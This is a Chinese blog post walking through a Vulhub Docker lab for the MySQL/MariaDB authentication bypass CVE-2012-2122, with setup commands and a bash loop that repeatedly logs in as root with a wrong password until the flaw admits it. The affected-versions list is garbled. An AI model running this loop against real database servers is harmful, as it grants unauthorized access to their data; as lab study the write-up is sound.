您的位置:首页 > 数据库 > MySQL

利用Vulnhub复现漏洞 - Mysql 身份认证绕过漏洞(CVE-2012-2122)

2019-07-12 16:34 2341 查看

Mysql 身份认证绕过漏洞(CVE-2012-2122)

  • 复现过程
  • Vulnhub官方复现教程

    https://vulhub.org/#/environments/mysql/CVE-2012-2122/

    漏洞原理

    当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

    受影响版本:

    • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
    • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

    参考链接:

    复现过程

    启动环境

    https://blog.csdn.net/JiangBuLiu/article/details/93853056
    进入路径为

    cd /root/vulhub/mysql/CVE-2012-2122

    经过测试,本环境虽然运行在容器内部,但漏洞是否能够复现仍然与宿主机有一定关系。宿主机最好选择Ubuntu或Mac系统,但也不知道是否一定能够成功,欢迎在Issue中提交更多测试结果。
    搭建及运行漏洞环境:

    docker-compose build && docker-compose up -d

    用时:1分半
    环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。

    漏洞复现

    在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

    for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done


    进入SQL数据库后可执行SQL命令,比如:

    select version();


    更多测试和利用方法,见参考链接。

    内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
    标签: